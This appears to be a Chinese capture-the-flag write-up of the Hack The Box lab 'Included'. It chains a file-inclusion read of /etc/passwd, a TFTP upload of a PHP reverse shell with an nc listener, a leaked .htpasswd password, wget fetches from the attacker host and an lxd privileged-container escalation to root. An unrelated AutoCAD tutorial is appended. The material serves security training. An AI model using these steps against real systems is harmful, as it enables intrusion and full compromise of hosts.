STARTING POINT TIER 2 Included

本文通过一次实战案例展示了如何利用常见的Web漏洞进行渗透测试。从发现Apache服务版本开始,逐步利用文件包含漏洞获取敏感信息,最终通过容器技术实现了权限提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

STARTING POINT TIER 2 Included

老规矩上来就是nmap,发现起了Apache

└─$ sudo nmap -sS -sV -sC [ip-address]
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)

进入浏览器在前端界面没有发现有用的东西,但是url可能存在路径包含

http://http://10.129.95.185/?file=home.php

包含一下/etc/passwd

curl 'http://http://10.129.95.185/?file=/etc/passwd'
#output
...
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin

发现一个叫tftp的用户,tftp基于Trivial File Transfer Protocol传输文件。他跟ftp有什么不同呢?Difference between FTP and TFTP

其中关键的一点tftp使用UDP传输协议且不需要密码认证,先用nmap扫一下UDP端口

└─$ sudo nmap -sU -sV [ip-address]
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp

🆗那就先连一下吧

└─$ tftp [ip-address] 
tftp> put php-reverse-shell.php
Sent 5685 bytes in 4.5 seconds

我们把WebShell传了上去然后通过LFI执行我们的shell。现在的关键是需要知道我们上传的shell在哪。根据TFTP得知

The default configuration file for tftpd-hpa is /etc/default/tftpd-hpa.
The default root directory where files will be stored is /var/lib/tftpboot.

那么包含一下/var/lib/tftpboot/php-reverse-shell.php

先监听一下端口nc -lvnp 1234然后在浏览器输入http://http://10.129.95.185/?file=/var/lib/tftpboot/php-reverse-shell.php🆗反弹shell到手。

进入mike目录cat user.txt告诉我们没有权限。所以需要找到mike的密码。

查阅MDN文档使用Apache限制访问和基本身份验证

.htaccess 文件引用一个 .htpasswd 文件,其中每行用冒号(“:”)分隔的用户名和密码. 你不能看到真实的密码因为它们是 encrypted (在这个例子中是使用了 MD5). 你可以命名.htpasswd 文件 为你所喜欢的名字, 但是应该保证这个文件不被其他人访问. (Apache通常配置阻止访问 .ht* 类的文件).

.htpasswd文件记录着Apache服务器的一些账密

www-data@included:/var/www/html$ cat .htpasswd
cat .htpasswd
mike:Sheffield19

www-data@included:/var/www/html$ su mike

mike@included:/var/www/html$ cat /home/mike/user.txt

id看看mike有哪些有用的信息

mike@included:/var/www/html$ id
id
uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)

LXD

What is LXD?

LXD是一个容器虚拟机管理器,

LXDLXC简介

Linux Container (LXC)通常被认为是一种轻量级虚拟化技术,介于chroot和完全开发的虚拟机之间,它创建了一个尽可能接近Linux安装的环境,但不需要单独的内核。

Linux守护进程(LXD)是轻量级容器管理程序。LXD是在容器技术LXC的基础上构建的,Docker之前使用过LXC。它使用稳定的LXC API在后台完成所有容器管理,并添加REST API,提供更简单、更一致的用户体验。

一个属于lxd用户组的成员可以提升为root权限。

A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.

至于怎么利用参考HackTrickslxd/lxc Group - Privilege escalation

按照说明启动了一个alpineimage,启动后在当前目录下会出现lxd.tar.xzrootfs.squashfs文件,需要把这2个文件传上去。

#In Listener
$ python3 -m http.server [port]
Serving HTTP on 0.0.0.0 port [port] (http://0.0.0.0:[port]/) ...

#In reverse shell
mike@included:/var/www/html$ cd /tmp
mike@included:/tmp$ wget http://[ip-address]:[port]/lxd.tar.xz
mike@included:/tmp$ wget http://[ip-address]:[port]/rootfs.squashfs

确认是否上传

mike@included:/tmp$ ls -l
-rw-rw-r-- 1 mike mike     852 May 28 08:43 lxd.tar.xz
-rw-rw-r-- 1 mike mike 2052096 May 28 08:43 rootfs.squashfs

#import the image
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

#verify that the image has been successfully imported
lxc image list
# run the image and set the security.privileged flag to true
# so that the container has all of the privileges that the root file system has
lxc init myimage mycontainer -c security.privileged=true

# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh

提升为root权限,进入/mnt/root/root拿到root.txt

一、综合实战—使用极轴追踪方式绘制信号灯 实战目标:利用对象捕捉追踪和极轴追踪功能创建信号灯图形 技术要点:结合两种追踪方式实现精确绘图,适用于工程制图中需要精确定位的场景 1. 切换至AutoCAD 操作步骤: 启动AutoCAD 2016软件 打开随书光盘中的素材文件 确认工作空间为"草图与注释"模式 2. 绘图设置 1)草图设置对话框 打开方式:通过"工具→绘图设置"菜单命令 功能定位:该对话框包含捕捉、追踪等核心绘图辅助功能设置 2)对象捕捉设置 关键配置: 启用对象捕捉(F3快捷键) 启用对象捕捉追踪(F11快捷键) 勾选端点、中心、圆心、象限点等常用捕捉模式 追踪原理:命令执行时悬停光标可显示追踪矢量,再次悬停可停止追踪 3)极轴追踪设置 参数设置: 启用极轴追踪功能 设置角度增量为45度 确认后退出对话框 3. 绘制信号灯 1)绘制圆形 执行命令:"绘图→圆→圆心、半径"命令 绘制过程: 使用对象捕捉追踪定位矩形中心作为圆心 输入半径值30并按Enter确认 通过象限点捕捉确保圆形位置准确 2)绘制直线 操作要点: 选择"绘图→直线"命令 捕捉矩形上边中点作为起点 捕捉圆的上象限点作为终点 按Enter结束当前直线命令 重复技巧: 按Enter可重复最近使用的直线命令 通过圆心捕捉和极轴追踪绘制放射状直线 最终形成完整的信号灯指示图案 3)完成绘制 验证要点: 检查所有直线是否准确连接圆心和象限点 确认极轴追踪的45度增量是否体现 保存绘图文件(快捷键Ctrl+S)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值